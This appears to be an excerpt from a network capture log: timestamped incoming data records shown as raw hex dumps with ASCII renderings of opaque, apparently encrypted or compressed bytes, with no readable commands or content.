                                                                                                                                                                                    2023-01-05 07:58:37 UTC12194INData Raw: 8e 1b 83 ed 87 9b e1 31 c1 d1 0a bd 6b 24 be ab d0 aa a8 ca 90 f5 f1 c0 2d d9 cf e4 8f d4 d9 93 68 c4 77 42 f5 dd ca df db 5a ce 45 79 b2 86 f7 7f 9d 2b 38 40 c7 f1 68 66 d9 9a dd c1 9f 0e 73 f1 0f 36 7b 66 55 c4 6a db 07 15 2b b2 c8 c8 3c e1 0b 4e 2c a4 cb 2c 1b e8 f9 b0 42 b7 fc 25 76 01 27 3e b1 a1 97 6a 0e b0 14 5f d5 1f b8 5f ef 2e f4 60 28 08 50 83 ac f7 ad 50 3e ee d9 ed 08 2c 37 4a ae 2a e3 e0 a1 3c 12 d0 d2 91 55 c6 dd d2 0b 8a 67 be 93 3f 4a 1f b2 13 30 25 b2 5e 36 98 34 c0 8a 16 43 eb 9d c6 04 1b ae 28 38 fb 72 8e fb cf 35 c0 50 dc 6a 65 d9 fe 9f ee f1 8a a5 8d 88 be f5 5f 47 26 24 e4 40 c1 20 54 cc aa af 2f ba dd 18 6a 67 0e 26 89 26 66 af d2 1a e0 56 12 53 61 cc 82 48 55 aa 74 ad d0 6a f4 03 1a 72 3e 00 4b 1c 1c d0 0c 0f ba fa fe 29 14 76 9b
                                                                                                                                                                                    Data Ascii: 1k$-hwBZEy+8@hfs6{fUj+<N,,B%v'>j__.`(PP>,7J*<Ug?J0%^64C(8r5Pje_G&$@ T/jg&&fVSaHUtjr>K)v
                                                                                                                                                                                    2023-01-05 07:58:37 UTC12210INData Raw: 24 3c ff 90 55 44 8b 4b d6 e8 25 d8 8a eb 68 78 c3 2d 5b b4 ac c3 3f 50 6a 58 0c 71 b8 74 6b b5 32 83 37 e3 76 37 75 1f f1 9a c0 af b9 45 99 5e b6 00 55 61 4f f2 5a d2 d9 69 af 4a 95 2d 89 ad 38 c9 6a 22 3f ae 42 8f c7 fc cb 05 ab 4a b2 ec 4a c3 64 26 74 88 24 67 21 39 dd 6c db 9e cd 28 b1 1f 74 ff b7 d0 0a 82 de 29 a7 60 83 60 33 76 7b 29 e0 b7 94 a4 4f ef bd 1f 23 3c 3a a0 f8 1c de cb eb 5f c6 c7 d7 11 51 31 33 2d e0 6f 6b 27 e2 a9 4c 14 f6 f2 e9 e6 99 10 da 33 e4 c2 e5 50 aa 04 01 c3 17 18 c5 08 1c 5f 8c 6b a0 3e fc 78 a9 14 36 e2 e5 28 4e 6b 4a 2f 01 61 e3 f1 ba a1 4f 22 c5 59 30 04 57 12 7a 47 cf 99 47 b0 1a 33 b6 f9 ed b5 2f e4 12 c5 09 33 35 b6 a1 7c ec d8 38 4d 0d 75 1b 30 5e 2f 5d 6d a6 9d 53 c5 a4 6d 81 bf b8 0e 52 86 82 da 1a 14 65 1a 41 e7 c8
                                                                                                                                                                                    Data Ascii: $<UDK%hx-[?PjXqtk27v7uE^UaOZiJ-8j"?BJJd&t$g!9l(t)``3v{)O#<:_Q13-ok'L3P_k>x6(NkJ/aO"Y0WzGG3/35|8Mu0^/]mSmReA
                                                                                                                                                                                    2023-01-05 07:58:37 UTC12226INData Raw: 6a 86 13 df 49 e0 06 c5 ba 12 9b 0d 0a de da ca 6f 3a b5 53 15 3d be 1f 86 07 d2 af df 08 70 57 ce 93 b8 24 5d bc a9 b2 8e e9 df 98 97 b9 63 43 56 d5 1d e1 e7 b9 1d 17 51 14 1f fa 0b 6a 83 31 de 88 de 1b 3f 36 3f 21 c4 9a 4c 3a 4b f4 79 4e 30 5e 84 6b 72 45 f2 7b 5e a0 1a c3 36 9a 17 e9 71 53 11 ca 84 ae de 39 9f 65 75 7c 20 25 6f 9f da 5e 3d 74 e1 14 76 2f f5 55 d6 84 ce 45 ad 4c b1 98 b3 86 28 06 1c 1d 03 aa 4d 7c f1 16 8d 67 9a 66 b9 be ad dd 77 3a 13 da 68 08 9c 24 47 22 cf c9 ee 2b ad 5c 2c 88 b4 dd e6 d7 fe de 53 5c d5 61 08 21 49 db 6a c4 45 b6 ba 0f f4 22 1b 44 5d 35 88 9f 59 2f b4 dd 68 c4 7b cd aa e9 b0 0a aa 1f 8e 0b 2c 30 52 22 37 e0 5a df 7b 70 d3 d4 a8 94 be fc b8 20 24 ac 39 3b 43 f4 5d 77 ae 21 f5 dc 17 a2 99 ae d5 25 c4 dc 5c e9 9d 0b 66
                                                                                                                                                                                    Data Ascii: jIo:S=pW$]cCVQj1?6?!L:KyN0^krE{^6qS9eu| %o^=tv/UEL(M|gfw:h$G"+\,S\a!IjE"D]5Y/h{,0R"7Z{p $9;C]w!%\f
                                                                                                                                                                                    2023-01-05 07:58:37 UTC12242INData Raw: 77 48 56 28 a8 eb 96 27 a0 dd 46 76 5d dd 52 91 41 ce 58 21 bf 22 da c7 52 ab 96 a0 f4 22 e9 9d f5 36 84 6e a1 80 f2 dd 04 c5 d1 ce b5 c0 ef a3 d2 a8 ff 5d 54 c0 1d 79 6d cd 36 6a d3 bb 4a 4f de b4 90 26 9a 98 f6 e9 bd 36 eb 01 23 23 c7 09 dc 62 6f 97 f4 e8 bf c7 ca ef b7 8e 59 e0 6d af a9 c9 3b ef 3f 06 37 bf c2 f8 75 8c 28 48 3f 51 50 bb 53 8f d2 c6 c5 00 2d a0 ac 16 1c 7f 83 62 ab 28 ff 0c a5 5c a4 40 4d b3 59 24 1b 97 5e 5d 31 6a a4 c0 2d 3e 8a 2a a7 3f 36 2d 4b 3d 5f b9 90 44 ac fd 88 ff 9b 8e 9f 6d b2 01 75 48 7f 3b a2 3d 5a 66 8b ff ce ff fa a1 01 c0 31 92 af 92 0d ae c9 0d f1 3f 79 76 9e 64 b7 61 57 0a 0a c0 78 89 02 97 4d 88 ff 9c e0 3f 07 90 f5 70 b3 a2 30 31 a0 3f 38 eb dc 83 5b b9 4c 87 bc 3f 69 4c 13 87 57 ea 5f dd 12 c0 a9 3d 78 76 b7 55 14
                                                                                                                                                                                    Data Ascii: wHV('Fv]RAX!"R"6n]Tym6jJO&6##boYm;?7u(H?QPS-b(\@MY$^]1j->*?6-K=_DmuH;=Zf1?yvdaWxM?p01?8[L?iLW_=xvU
                                                                                                                                                                                    2023-01-05 07:58:37 UTC12258INData Raw: bf 8f c7 fb 2c 3e 3f 79 1b 4e 71 b4 25 d6 f0 63 06 46 a3 9c ef 31 ce 47 eb 1a e1 d4 61 af 1a 9d 46 69 e5 57 d5 f8 33 34 9f b1 d8 c4 66 e7 04 e6 2e 57 81 04 49 9e dd 5a 19 3f 0a 5b b0 e7 c9 4f 57 ed a5 1b cc 95 2a 36 ed 69 6a ae ea e0 7f b4 c9 81 ee 24 67 ae 4a 4a 58 1e eb a1 63 96 7e eb 63 a4 c2 8d c0 be 52 d5 1a 4b 8a ae da c8 44 88 ff b5 7a 88 11 4c 7e d2 e5 64 7d fe 4b 42 cd b7 39 11 10 9f 60 87 ef c1 31 ff a3 50 8e 64 cb 45 9e 7e e3 e6 6a b2 16 9d 5b 2f 90 57 00 7e 23 5b 55 02 e9 37 44 15 86 e1 fb 9a 8e af be 41 36 9f 51 95 0e 46 81 6e cb 3d 8a cb 4e 5c 62 e5 9c 16 b4 02 48 0b 23 91 3c 37 08 31 12 db 97 54 a8 a5 9a fd 1d 87 0d 5b 7d cf 99 7c 77 b7 a4 dc 40 3b 00 cd f3 72 ab bb 79 2e 7d 56 d4 b2 94 27 ff 61 89 89 d9 cf 43 52 33 f0 54 37 6c 01 79 1d 8f
                                                                                                                                                                                    Data Ascii: ,>?yNq%cF1GaFiW34f.WIZ?[OW*6ij$gJJXc~cRKDzL~d}KB9`1PdE~j[/W~#[U7DA6QFn=N\bH#<71T[}|w@;ry.}V'aCR3T7ly
                                                                                                                                                                                    2023-01-05 07:58:37 UTC12274INData Raw: bc e3 f7 ca 13 13 b3 6b b8 df 75 bf e5 09 d2 72 b5 82 5f 58 d9 c3 25 35 2b 2b 2c be 28 c9 2d da 97 e3 b6 bc b6 c4 cc e1 09 c9 36 9c 4a 7e 42 82 42 1f f1 fb 06 a0 42 89 0f f5 1a 64 a6 8b c6 4f 1b cf 83 99 ae 51 91 92 1b c0 84 65 34 49 45 fd 14 11 49 4c 5e d9 5e a4 ba 80 38 f4 6a 51 9a 90 d3 a3 14 c4 ed 1c 80 02 60 f1 d0 02 18 9d e2 f5 55 42 bd 7d 9f e4 62 91 05 e2 f0 e6 6b af 3c d9 13 ee 4f 47 72 0b 91 d5 9e f5 ec aa 75 a9 d1 e4 98 64 f1 04 39 65 56 cc 19 07 ed f7 14 94 b7 4c c3 4d 6b b1 b7 5b 14 50 22 30 31 18 f6 ae 21 0a 8c 1d b0 7b a9 67 4f 49 89 e8 05 08 78 ea 41 af 07 fc a5 4a 90 f8 fa b1 95 0b af ae 54 1e 01 c0 f4 35 d1 44 eb 50 80 13 f0 ca 9c fb 22 a5 6a 64 bc e1 33 1d 4f 45 4b 86 e3 6b 1e 97 39 04 d0 8c 11 15 00 19 c6 73 a6 6e ea a0 d6 b7 d8 69 c2
                                                                                                                                                                                    Data Ascii: kur_X%5++,(-6J~BBBdOQe4IEIL^^8jQ`UB}bk<OGrud9eVLMk[P"01!{gOIxAJT5DP"jd3OEKk9sni
                                                                                                                                                                                    2023-01-05 07:58:37 UTC12290INData Raw: 23 98 de e1 92 a5 37 d5 2b cb 8f 98 74 ad 28 20 9f 20 e9 59 99 0a 75 57 55 6a 0d 68 b5 0f 2f 94 25 e8 9a c6 94 10 05 7d d4 30 91 b2 12 de 0b 4d 65 b8 ca 6d 7a 39 da d0 db 02 ca 0a ef 78 a5 fe 18 c0 1f 93 bb 2e 61 26 f9 39 3d 20 0d e1 e1 39 6e 90 2b 61 29 66 72 fb 30 1f a1 c7 9f 14 3f 77 f7 65 db 21 30 bc ad db 9d 7d 74 92 b5 68 4c 68 0c f2 ed aa 9a 28 90 d9 6b 41 25 e1 97 0f 84 20 fb 11 95 8c 53 4b 8f 45 fd 5f 6c 6a 98 bf 7f d8 72 5d 42 dc 6b 65 c7 b9 13 58 b3 60 a6 3d 2a 5b 71 c7 62 68 00 51 42 08 3b 86 52 83 6f 23 6b 40 37 55 2d 99 28 a5 cd 5f 6e 5f c5 66 e0 9b 0c 5b 2f 19 92 d8 02 42 9e a0 8a 04 be 60 ac 18 1d d7 43 1b db ec ff b8 96 ce e7 79 05 29 5a 2e 32 a5 ce 8e 62 46 b3 ab 12 ee 77 88 4b b9 81 d3 bf d4 25 4b 14 81 d8 f0 49 18 21 54 5c 68 88 f4 b4
                                                                                                                                                                                    Data Ascii: #7+t( YuWUjh/%}0Memz9x.a&9= 9n+a)fr0?we!0}thLh(kA% SKE_ljr]BkeX`=*[qbhQB;Ro#k@7U-(_n_f[/B`Cy)Z.2bFwK%KI!T\h
                                                                                                                                                                                    2023-01-05 07:58:37 UTC12306INData Raw: 62 b2 77 3d b0 a5 37 99 5b e4 48 a0 cb 8a 8c 35 99 63 c0 e8 01 ca a5 e2 19 25 76 86 40 f1 f2 6c a7 ca ae cd 5f 5f a3 8a 12 a6 ca c1 f7 b6 14 be e5 1a 7e d2 00 75 18 ed a0 38 b5 5f 5d 9f 5e 4f 3a 98 74 19 ef b5 d9 87 96 db e6 da 27 e6 1c b8 63 e4 c4 a4 4e 72 af 62 11 52 45 05 3c ae 63 52 0c 91 bd 6b a2 78 db bf 3a 2e 3b fd 4c fb bd e4 26 21 4b bf 66 aa 2e c0 3f e8 77 c8 a5 a6 cd 17 c4 36 00 14 7d 21 98 88 10 24 9a 9a 16 81 ba b8 6e 82 bd 5a be bb 3f 52 e2 31 38 1b b3 da 8e d5 9d 2c c6 e8 54 68 0a 90 43 e6 5d 4d bd 9f 7c 6d 09 f5 3c 51 9c b1 e0 23 7e 07 51 b9 e8 78 19 af 3c 1b 26 3f 4d a8 35 00 91 b5 a9 61 94 03 42 07 75 f2 e8 a5 45 68 d7 8a 6a 31 e3 b7 79 84 bb c3 36 0f 2b b8 0d bb f9 63 2e 33 f7 30 9c 0c 4f d8 5f 95 9c 89 c5 2a 43 76 15 0a ab 7e 26 de fa
                                                                                                                                                                                    Data Ascii: bw=7[H5c%v@l__~u8_]^O:t'cNrbRE<cRkx:.;L&!Kf.?w6}!$nZ?R18,ThC]M|m<Q#~Qx<&?M5aBuEhj1y6+c.30O_*Cv~&
                                                                                                                                                                                    2023-01-05 07:58:37 UTC12322INData Raw: da 0d 06 2c 0e 93 fb f4 dc a9 36 21 da 32 04 61 c0 36 ce fa 08 0d f1 78 a4 14 31 ba c5 58 5e c9 04 ee 10 79 6f 68 af 41 64 e1 91 d5 92 a0 76 20 a1 11 bd 35 d9 f8 90 05 66 0c 74 89 14 db 3b ca cb 97 ae 0b fd 49 40 a7 f7 5a 11 b1 e4 02 9e bb c6 56 a8 a0 96 3a 0a 7a 43 f5 db 0a d4 29 fb 34 f0 ef 17 38 8b a8 9e 2e 2f 3b 25 f3 01 5d ff d0 62 72 66 96 a7 ad 6e 3b 1b 94 03 3e c7 25 cb bf 88 7b 81 74 aa b4 a6 d9 4f ed 2d 48 e8 a2 b9 e4 dd 12 67 d9 86 5d 94 75 0d 67 27 d3 c9 df 4f 0f d8 ff 69 04 6a 6c 63 09 99 01 fa 44 8c ca c9 88 9d a4 d4 84 a1 4d e0 de 87 d3 37 3a 6f c0 56 45 01 e6 4e df 9f c7 38 f0 48 d6 9a 4e 92 c5 44 ed 1c 4b 3a 30 d5 aa bd 79 7f f6 73 1e e6 f9 a7 51 d2 c5 08 e3 f1 c8 ad 20 6e 7c ea 4a da 00 7c ed fd c3 db 8a 94 22 ee bb 2f 3c eb 15 37 7e be
                                                                                                                                                                                    Data Ascii: ,6!2a6x1X^yohAdv 5ft;I@ZV:zC)48./;%]brfn;>%{tO-Hg]ug'OijlcDM7:oVEN8HNDK:0ysQ n|J|"/<7~
                                                                                                                                                                                    2023-01-05 07:58:37 UTC12338INData Raw: 11 d2 f5 28 67 cc 0a 15 73 a9 8a 2c 11 29 b1 df 57 bc 90 91 76 6c ef 9b 32 0a 44 de 1f 27 29 b0 d3 ad 8e ea 0e 58 ed ec 92 7d f3 c0 b8 3c d9 9c 8f dc 51 a9 1f c5 a2 ca 68 94 e1 32 07 60 89 f8 96 6e ac b4 d4 75 72 bc b2 63 ce 96 97 44 ea ce 77 a9 b2 76 e3 36 1a 1f 5e a5 e3 e0 fc 63 75 0c 92 0f ad f9 db 44 14 e0 2f fb 5b bf 4b 0f 87 37 2c da 53 a2 d5 dd 96 c6 49 05 53 f9 d8 1b 0a 6d 66 5d d8 9e c1 6b e5 2d 10 d0 3c 4f a6 70 b1 b5 47 4f 7b 5b 6e ae 91 cf b4 e7 63 f4 9a ba fe 01 8d 09 6f 4b 48 0b 38 d9 8c ac 23 17 27 95 76 d6 21 ec 60 b0 7f 5c 9a 58 10 26 70 e0 b1 cf ff c7 b6 e5 31 71 54 3c 05 f7 d1 3e 22 38 57 08 2f 6b 31 94 cd 95 bb 22 36 c9 bf f0 68 7b d2 a4 0d de 58 af 31 1a a7 11 85 84 2b 64 18 6a 09 8f 4a 5f 69 75 c9 93 c6 65 19 20 22 5d 11 4b 83 10 8e
                                                                                                                                                                                    Data Ascii: (gs,)Wvl2D')X}<Qh2`nurcDwv6^cuD/[K7,SISmf]k-<OpGO{[ncoKH8#'v!`\X&p1qT<>"8W/k1"6h{X1+djJ_iue "]K
                                                                                                                                                                                    2023-01-05 07:58:37 UTC12354INData Raw: 8f f7 20 ff c2 80 ba a2 23 28 0a fc 50 69 79 d5 d9 2b b0 7a 9b 0a 82 59 08 f2 6c aa 94 07 0f 71 95 ff 6a 1b 7f d9 87 40 e4 5b 32 2b 8e 2a 49 48 66 13 a8 ad d1 43 f1 c9 73 ff ff 1d c7 96 1f 4c 60 a5 7f 9b 93 15 d8 14 ff 12 cb ac fe 55 c1 fe 0b f3 06 dd 8f 6d 5d 9a e9 23 9e 39 59 17 00 52 35 1e 20 f0 28 e8 e0 98 a3 c0 dc 7b fb de a2 69 ee 7b 6a 0e ca 0a 1c 2f 87 0e f9 9a b9 a0 76 ab e1 90 32 ff 94 44 79 dc 3a f7 46 4b fc 36 43 64 d8 3c a7 fa 2c d6 8e f7 1c 16 04 7a 7c cf 88 b6 25 a9 f6 36 f4 f6 8b b2 14 b0 30 96 64 f2 ed da 5e f0 73 27 f3 1d 6c 91 04 27 3d 08 3b 6a 02 a2 16 9a 34 a3 a1 49 c3 8a 4b 56 af ca de da b4 19 5d a9 13 b2 62 b7 7d ee 75 be e2 94 82 14 0a 6c 9c 0e 09 df ba 8a 80 fa 3e 73 dc 95 2c ae df 10 9c 5f a1 dd fe 17 0f db f4 94 25 81 2b c9 f4
                                                                                                                                                                                    Data Ascii: #(Piy+zYlqj@[2+*IHfCsL`Um]#9YR5 ({i{j/v2Dy:FK6Cd<,z|%60d^s'l'=;j4IKV]b}ul>s,_%+
                                                                                                                                                                                    2023-01-05 07:58:37 UTC12370INData Raw: ee bb 5c 14 2e ab 35 0b bc ce 15 ee 1b ff c8 f9 5a e6 3f 6d 5c 54 58 29 d0 b4 31 7b 88 42 e1 dd 05 f4 4d 8b c9 59 34 2a e2 32 41 0f 0f 59 59 ae bd 99 a0 a9 2a c9 fe c8 d6 d3 99 61 e6 06 87 c2 45 cf d2 99 33 a9 38 54 79 9e 8a 6b 2b f1 53 15 c8 d8 f9 bf dd ea 6f a2 19 f8 86 a3 e1 eb 0a e7 f3 65 2c bb 15 f6 cd d7 5d 68 ad 99 51 45 dc c6 ba 42 e4 58 12 6c 88 0c 0b 3a d5 1b de 52 c4 f5 c2 f2 6c 70 e9 a7 73 07 88 fb db 70 5a 78 ba 92 61 af 38 20 09 c3 e7 a1 05 02 45 be 68 a2 43 5d 5d 5c c6 11 3a bc 31 50 68 d5 c8 cb 93 54 26 e9 b5 dc 91 2f f8 22 a7 f2 e9 ba be 74 3b a8 71 19 2e e6 ff 99 b3 31 17 d4 46 73 6d 57 47 c5 39 ca 95 8b 6d 65 d3 5b 3d ac d8 1e ec e6 14 09 f9 62 8b e4 20 1b c7 9e 7c ce fa 76 a0 bb 0d b0 17 29 fc 49 cd 26 83 35 77 03 b3 23 71 e7 ac ea 90
                                                                                                                                                                                    Data Ascii: \.5Z?m\TX)1{BMY4*2AYY*aE38Tyk+Soe,]hQEBXl:RlpspZxa8 EhC]]\:1PhT&/"t;q.1FsmWG9me[=b |v)I&5w#q
                                                                                                                                                                                    2023-01-05 07:58:37 UTC12386INData Raw: 2f 29 24 03 74 4d 2d 34 9a e4 50 b4 ad 91 89 1e 4c 5b 4c 59 f2 5b 7e e8 66 a9 a8 cb 4e 4a bb 37 1f 2c 62 66 8b 79 35 d3 6c bc f2 56 05 4e 5d 84 5a d8 89 41 99 28 d9 1b 82 0c cc 63 a9 d5 65 63 c3 5e 22 69 6c 95 ac fb 41 48 6c 5b ea 69 e8 51 ab df 97 0b 61 5d 00 5d ff 54 38 0e 58 16 f5 cb 18 11 44 11 b3 8d d2 ab fa c6 24 07 87 1b 23 d5 31 08 40 06 ca 48 bc 43 65 51 25 0c 39 e4 a1 c1 bf ea 07 fc 12 c6 cb 53 93 71 08 d9 42 dd af 7a 71 e9 d9 65 57 32 f4 97 ff eb 4c 3d 4d d0 28 97 dd 95 96 81 ac 51 a2 bc f7 27 e0 f6 50 14 ae 19 15 39 9e 94 ee ef 56 48 83 72 04 1a 77 e1 a7 71 b8 4b f4 a6 18 8b da e9 a9 73 dc af 4d c5 17 e1 b5 77 c0 5f 02 9a 23 6c b8 29 82 7f 2a f5 8a 1f 50 71 4d c2 9c ad bf d9 c6 ac 3f 7b d0 fc a4 8b 18 8f c2 06 97 36 17 a5 70 e7 b3 76 08 31 f6
                                                                                                                                                                                    Data Ascii: /)$tM-4PL[LY[~fNJ7,bfy5lVN]ZA(cec^"ilAHl[iQa]]T8XD$#1@HCeQ%9SqBzqeW2L=M(Q'P9VHrwqKsMw_#l)*PqM?{6pv1
                                                                                                                                                                                    2023-01-05 07:58:37 UTC12402INData Raw: d0 41 c1 9c f0 0d 6e 14 a5 63 bd 51 f8 88 7d 8f 2f 6d b9 b7 4f 71 90 fb 85 48 43 c0 2e 6e f5 e8 03 82 cd 25 40 61 2b 09 79 37 70 1a 61 24 8e a3
                                                                                                                                                                                    Data Ascii: AncQ}/mOqHC.n%@a+y7pa$
                                                                                                                                                                                    2023-01-05 07:58:37 UTC12402INData Raw: e4 c6 c0 4c 13 b8 a7 f3 76 2f 4d ce 09 3f bf 87 94 cf f5 db e5 1f 24 d6 4e ab 9f 9b e0 ad 27 6b 2f 7f 5b 6e b4 78 f1 ac 6a e1 35 90 0f 88 cb 94 5e 4a 2e e2 9a 02 aa af 64 de 24 e1 fa a5 d2 11 b9 63 13 df 71 a0 3f 6a 81 c6 b7 dc 9e c6 10 aa 0f c9 87 e7 28 10 f3 83 cb 70 6a 81 f5 96 ab c2 2f 20 60 b3 ae 17 7a 86 9c 1f d1 00 d7 5b aa be 5b bc 66 d8 b2 d9 65 7a f0 dd 3f 91 ca d9 9f b0 60 dd 82 bb d7 71 a2 57 c6 b6 d7 b1 d4 28 92 a5 d1 2f e5 6b 8d 73 23 ce 0b bf 18 03 6d 21 46 b0 7f 56 df 70 d1 be ac 0f e2 5b 78 dc 3b cd 0c 05 25 fe 43 92 45 0a 07 90 59 57 e7 02 21 36 2d 0d e5 14 06 23 0b 35 90 69 37 09 7d 21 22 18 57 5f 27 af 82 16 c2 2f c6 5e 26 15 cf 07 8b bb 7a ad 84 21 63 16 08 cc b6 53 a2 2d 9e 35 61 d5 4f d9 5f bc bd 92 c1 e5 c3 73 53 1d 4e be d8 f7 5a
                                                                                                                                                                                    Data Ascii: Lv/M?$N'k/[nxj5^J.d$cq?j(pj/ `z[[fez?`qW(/ks#m!FVp[x;%CEYW!6-#5i7}!"W_'/^&z!cS-5aO_sSNZ
                                                                                                                                                                                    2023-01-05 07:58:37 UTC12418INData Raw: 6a 44 40 c9 08 17 c8 e1 6f 3a 75 be b0 3c 94 e4 4b 24 18 8d 4b dc af b1 e4 4a 8e 14 90 79 69 de 0a c7 79 d9 ce 82 73 a4 35 0a 71 89 42 d8 91 17 e6 60 3f b8 5d 20 d8 fb 52 ee c8 f0 a4 a1 1c 4d cf ef 19 bf 16 14 e7 27 3d 24 10 87 b9 92 ba 4c 6b 1e 13 65 ea 18 f0 99 3c ce 1c 0c 47 f2 cf 78 60 3a aa b0 cb 87 35 71 76 b6 45 9b f9 b0 04 02 bc 31 a1 8c 3b 5e f8 d0 c3 2c da e1 28 2a 67 97 c1 b9 da 15 6c d7 e3 59 f7 1e 28 be 78 4b 8e 9d 97 05 29 ec 2a d9 f1 88 a2 09 ea 77 ec 80 0c 88 3a b6 8e d0 e6 b5 4f 9c e0 28 b1 21 7e 32 2c cb 48 94 8a 39 5e e6 fc 5d 5f c9 23 95 c3 37 dc 43 81 61 46 56 67 cd e9 60 b7 17 98 87 b6 87 bf 8d 64 6e 73 74 82 30 1d 82 de b3 82 ce dc 3b 13 67 10 3b 9c af ca 31 aa 6b da da cc 7b 1c 74 66 aa 92 53 a0 04 2c 94 1a e7 8d db 54 7c 8e 48 28
                                                                                                                                                                                    Data Ascii: jD@o:u<K$KJyiys5qB`?] RM'=$Lke<Gx`:5qvE1;^,(*glY(xK)*w:O(!~2,H9^]_#7CaFVg`dnst0;g;1k{tfS,T|H(
                                                                                                                                                                                    2023-01-05 07:58:37 UTC12433INData Raw: 91 03 dd 59 14 d5 18 70 1f 19 f8 57 73 c8 24 b3 07 03 d0 f6 2f 54 30 89 a3 3a 0f c7 7d c2 a4 16 75 2c fc 1a 3f 1c b7 ce f9 02 16 9f 9e 6a 9d b1 2c 16 7d 14 94 d0 6e 55 5c aa 6c a5 d0 24 5d da 33 b1 6c 31 55 97 c6 09 1b 20 32 e4 bd 0c ef 12 da 32 a1 10 68 3d 09 46 4f 36 61 8a 99 35 bc 7a 06 ad 0c 5d 7c f7 1c ba ed 91 91 83 ec ba ab db a5 24 17 4d d2 fb 76 d9 11 6f 14 cd 0f 66 dd 19 47 99 19 4b 3b 3e 96 25 92 26 30 71 2a 15 c7 4f 60 00 8e 0c ce d7 40 af 5d 18 45 57 eb c9 9a 61 2c 5f c4 8c 1f 0c db d8 6b 2c 1e 56 d4 29 52 18 c7 6b 2c 6b 9b 5b a6 19 f3 24 66 95 7d 6f b5 c4 3f 65 fb 56 39 a1 2f ba 09 1c 6d 5f ec 6c 71 95 4d 7d 8f 0c 21 da 4f 1e ec 38 90 4d 9f fe a9 02 77 77 09 69 5e 30 aa e0 65 d3 41 a4 2c e4 a5 55 55 32 72 03 f2 ee ab 90 86 66 29 d2 20 fc e2
                                                                                                                                                                                    Data Ascii: YpWs$/T0:}u,?j,}nU\l$]3l1U 22h=FO6a5z]|$MvofGK;>%&0q*O`@]EWa,_k,V)Rk,k[$f}o?eV9/m_lqM}!O8Mwwi^0eA,UU2rf)
                                                                                                                                                                                    2023-01-05 07:58:37 UTC12449INData Raw: c0 ab 9e 63 2c c8 f9 9b a1 e2 f5 65 8c 8c 21 65 4c 87 2e 96 70 a7 ee c3 9f 18 7a dc df 9b 64 54 58 c5 fe 27 52 20 f0 7f 41 50 d1 ec c6 c7 a0 b8 b9 bb 6c 21 81 fe 3d 16 60 06 48 41 ec 86 f0 ec 44 1c 9f 40 99 42 dc 5d e9 79 07 5e d2 e1 74 57 30 cd dd 25 39 6c 06 45 ec e2 38 a5 da a8 eb 97 76 8e f1 2e 41 82 d0 0c bf 54 8f 86 a5 4c 19 6a aa ab a9 f1 9a e2 5e 43 df f3 e1 f5 84 62 b6 19 ec b6 83 c8 53 2e 32 6c 76 df c3 15 db bd 5b 8d ce 9a 85 fb a7 3b 7d 2c d4 2e 96 f9 f8 18 5b e4 29 e6 60 2e 7f 5a 59 5f 76 f9 06 1d 0d f1 6f bd 67 75 c4 b6 51 36 09 f1 31 87 3f 0f da 77 d7 bb c6 a4 4b 19 27 58 22 33 96 f4 cc b3 25 58 6f c8 25 fa 15 9d a9 7b ad 59 16 57 5a 06 4f f8 7f 64 dc 32 96 a0 88 59 2f 5b 51 89 c5 9f 4c 71 e0 f5 f6 cd b8 99 9c df cd 64 77 e8 ca 72 6a 5a eb
                                                                                                                                                                                    Data Ascii: c,e!eL.pzdTX'R APl!=`HAD@B]y^tW0%9lE8v.ATLj^CbS.2lv[;},.[)`.ZY_voguQ61?wK'X"3%Xo%{YWZOd2Y/[QLqdwrjZ
                                                                                                                                                                                    2023-01-05 07:58:37 UTC12465INData Raw: 75 94 77 c3 16 d9 bb 97 5f 7b f0 1b c6 86 0c 04 bb 52 32 60 eb 49 ef d7 2b 0e 4e f2 81 80 03 e5 f6 2a 83 89 2b 5f 8b 33 a2 ad 8b 91 4f 1f 79 c8 da 18 4f a3 23 1b db a4 d4 af 95 86 d0 d0 0f 07 f9 31 a0 35 f2 dc 21 d4 fa ee a4 89 72 c9 62 3b 33 4c cc b1 1e b9 63 62 49 33 d2 8e 46 8f fd 02 2c 1c f8 8c f5 f2 de 02 c6 44 54 7f a5 2e 78 d8 28 74 d4 08 63 20 92 75 b5 19 c0 5b 67 a2 82 02 91 54 70 01 4d 91 57 47 59 f2 f5 c0 b1 38 31 1c 22 21 2f 9b f5 ea 03 5b 95 e3 f4 ea ca 90 e0 6c 7a bf 96 04 a6 45 c5 44 cd e2 70 83 b8 35 59 b2 30 e7 da a8 f3 b1 e0 d7 32 7b 01 ac 4f 5f 41 cb 50 ad b7 54 ca 56 2f 70 13 1d 20 40 42 84 44 87 63 ab c9 91 da 6b ea 1b 46 3d db 2c fd cb 79 e1 a2 e3 cc b8 b4 95 61 1b 3f 4c 8e c4 02 91 c2 c5 32 5a 47 1b 9a 1d 82 6b 30 fd 89 17 29 fb 0d
                                                                                                                                                                                    Data Ascii: uw_{R2`I+N*+_3OyO#15!rb;3LcbI3F,DT.x(tc u[gTpMWGY81"!/[lzEDp5Y02{O_APTV/p @BDckF=,ya?L2ZGk0)
                                                                                                                                                                                    2023-01-05 07:58:37 UTC12481INData Raw: a6 01 16 a9 ee fb a3 60 51 eb 21 b6 18 4f 1b b9 99 1e da 91 ff d9 d5 6d 51 d4 be c9 38 12 6e 38 74 14 2d ac f0 5a db 3a 9d 21 f4 13 33 e5 49 74 92 c0 4e a5 27 23 d6 46 c6 12 53 4e 71 32 b2 b7 eb 86 01 a4 20 3f aa ba b2 08 9d c3 d2 87 be 71 c8 35 65 69 e2 1c b1 a0 08 8d a5 8b 6a cc c7 7b 49 0f 05 bd 99 20 2e 42 2f e7 8b 52 61 5d 46 de ed 53 d0 c8 58 dd 8b 0b c3 bf 96 6b 9e ae 73 ca f5 d9 6f da 57 4a 97 fa c8 2f e4 71 bb e9 a2 11 0c 57 78 3a 89 31 ff 92 73 1c cc 23 d4 b3 54 aa e0 17 fd 19 fc 83 19 5d f6 b9 9a 12 52 57 79 77 7d 1e ea 3e cc 19 72 9b cb 7d 2d 94 d2 ed df 5e 52 f0 2c c7 30 e4 e9 02 2e 04 1e d9 66 78 bb 25 4a dd 80 54 7f fa 3e 4b b7 4d a4 b0 66 d9 2f 69 2f 37 59 89 fa c9 12 c6 91 7a cd b0 e6 59 00 09 fd 34 08 e9 ed fb 9b 8c 48 e4 e7 8e 9e 7f 7d
                                                                                                                                                                                    Data Ascii: `Q!OmQ8n8t-Z:!3ItN'#FSNq2 ?q5eij{I .B/Ra]FSXksoWJ/qWx:1s#T]RWyw}>r}-^R,0.fx%JT>KMf/i/7YzY4H}
